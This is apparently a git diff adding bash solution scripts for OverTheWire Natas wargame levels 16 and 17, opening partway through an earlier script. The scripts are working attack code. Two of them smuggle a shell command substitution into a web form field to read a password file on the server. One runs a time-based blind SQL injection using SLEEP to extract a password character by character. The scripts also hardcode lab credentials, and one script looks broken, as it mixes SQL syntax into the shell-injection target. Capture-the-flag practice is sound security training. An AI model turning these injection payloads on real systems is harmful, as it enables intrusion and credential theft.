+  local FGUESS="%${#MAX}s - %-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"
diff --git a/overthewire/natas/scripts/natas16.sh b/overthewire/natas/scripts/natas16.sh
new file mode 100755
index 0000000..902409f
--- /dev/null
+++ b/overthewire/natas/scripts/natas16.sh
@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)'
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$1" \
+       -sS \
+    | grep --after-context 2 "
" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+
diff --git a/overthewire/natas/scripts/natas16_2.sh b/overthewire/natas/scripts/natas16_2.sh
new file mode 100755
index 0000000..ed52c3d
--- /dev/null
+++ b/overthewire/natas/scripts/natas16_2.sh
@@ -0,0 +1,70 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$2" \
+       -sS \
+    | grep --after-context 2 "
"
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"
diff --git a/overthewire/natas/scripts/natas17.sh b/overthewire/natas/scripts/natas17.sh
new file mode 100755
index 0000000..253ee78
--- /dev/null
+++ b/overthewire/natas/scripts/natas17.sh
@@ -0,0 +1,108 @@
+#!/usr/bin/env bash
+
+USERNAME="natas17"
+PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
+TARGET="natas18"
+
+DELAY=4
+PREFIX="5mxv8BZZVSMzzYPcY95M9m"
+
+req() {
+  CMD=$@
+  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
+       -X POST \
+       -u "$USERNAME:$PASSWORD" \
+       -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
+       -sS &>/dev/null
+}
+
+time_req() (
+  export STAT
+  export CMD="$@"
+  (time (req $CMD; STAT=$?)) \
+    |& grep real \
+    |  awk '{print substr($2, 3, 1)}'
+  return $STAT
+)
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  ELAPSED=$(time_req "LENGTH(password)$1")
+  return $(( ELAPSED < DELAY ))
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s-%-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
+  return $(( ELAPSED < DELAY ))
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          local NEWCHAR
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            NEWCHAR=${chars:MIN-1:1}
+          else
+            NEWCHAR=${chars:MAX-1:1}
+          fi
+          PREFIX="$PREFIX$NEWCHAR"
+          echo -e "[+] Update: $NEWCHAR -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"
diff --git a/overthewire/order b/overthewire/order
new file mode 100644
index 0000000..39a424a
--- /dev/null
+++ b/overthewire/order
@@ -0,0 +1,2 @@
+bandit - linux essentials
+natas  - web shtuff